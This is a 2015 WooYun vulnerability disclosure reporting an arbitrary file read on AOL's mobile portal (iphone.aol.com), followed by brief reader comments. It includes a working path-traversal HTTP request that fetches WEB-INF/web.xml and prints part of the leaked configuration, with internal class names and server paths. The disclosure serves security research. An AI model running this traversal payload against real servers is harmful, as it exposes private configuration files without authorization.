当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0103734

漏洞标题:arbitrary file retrieval of an aol`s website

相关厂商:aol.com

漏洞作者: 路人甲

提交时间:2015-03-25 19:51

修复时间:2015-03-30 19:52

公开时间:2015-03-30 19:52

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

mobile portal of aol --iphone.aol.com
proof of concept:

GET /ajax.jsp?m=..%2f..%2fWEB-INF%2fweb.xml%3bx%3d&p=dynamicleadslide&vbclass=vid_over&ajax=1&sitHot=null&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config&dlItem=633100&dlug=false&cv=6&_c=main5 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) 
Accept: text/html, */*; q=0.01
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
Cache-Control: no-cache
X-Forwarded-For: 127.0.0.1
Host: iphone.aol.com
Accept-Encoding: gzip, deflate


web.xml retrieved:

HTTP/1.1 200 OK
Date: Wed, 22 Mar 2015  
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=iphone.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
ModPagespeedDisableFilters: rewrite_javascript,inline_css
ModPagespeed: on
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 3506
Set-Cookie: JSESSIONID=16DABAA250AA22B57E02F9BAE2D18EC7; Path=/aol
Content-Length: 3506
<?xml version="1.0" encoding="UTF-8"?>
<web-app id="WebApp_ID" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd">
    <display-name>portal5</display-name>
    <listener>
        <listener-class>
            com.aol.pubt.forc.util.ContextListener
        </listener-class>
    </listener>
    <listener>
      <listener-class>
         net.sourceforge.wurfl.core.web.WURFLServletContextListener
      </listener-class>
    </listener>       
    <listener>
        <listener-class>
			com.aol.portals.core.ContextListener
        </listener-class>
    </listener> 
    <context-param>
        <param-name>wurfl</param-name>
        <param-value>/data/servers/portal_fe_wurfl/wurfl.zip</param-value>     
    </context-param>
    <context-param>
        <param-name>wurflPatch</param-name>
        <param-value>/data/servers/portal_fe_wurfl/wurfl_patch.xml</param-value>
    </context-param> 
    <filter>
        <filter-name>VL6Filter</filter-name>
        <filter-class>com.aol.portals.core.utils.VL6Filter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>VL6Filter</filter-name>
        <url-pattern>/*</url-pattern>
        <dispatcher>FORWARD</dispatcher>
    </filter-mapping>
    <filter>
        <filter-name>CMSFEPreviewFilter</filter-name>
        <filter-class>com.aol.pubt.dynapubcms.CMSFEPreviewFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>CMSFEPreviewFilter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <filter>
        <filter-name>DataLayerTracking</filter-name>
        <filter-class>com.aol.portals.aol.TrackingModuleDataFilter</filter-class>
    </filter>
.......
.......
.....


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-03-30 19:52

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-03-25 19:52 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    一个AOL的网站任意文件检索

  2. 2015-03-25 20:25 | 大物期末不能挂 ( 普通白帽子 | Rank:132 漏洞数:23 | 1.一个学渣,只求每门都不挂2.想把漏洞提...)

    有种李姐姐的感觉

  3. 2015-03-25 22:36 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    歪果仁?

  4. 2015-03-26 08:19 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    LAOWAI?

  5. 2015-03-30 21:48 | 明月影 ( 路人 | Rank:12 漏洞数:8 | 学姿势,学思路。)

    英语都过几级了啊?

  6. 2015-03-30 23:11 | 我不得踢噶 ( 路人 | Rank:8 漏洞数:3 | Hello world!)

    lijiejie?

  7. 2015-03-31 09:37 | 十月 ( 路人 | Rank:12 漏洞数:1 | 小人物)

    arbitrary 嘛意思?我很low

  8. 2015-03-31 18:27 | F0rm ( 路人 | Rank:0 漏洞数:2 | )

    lijiejie !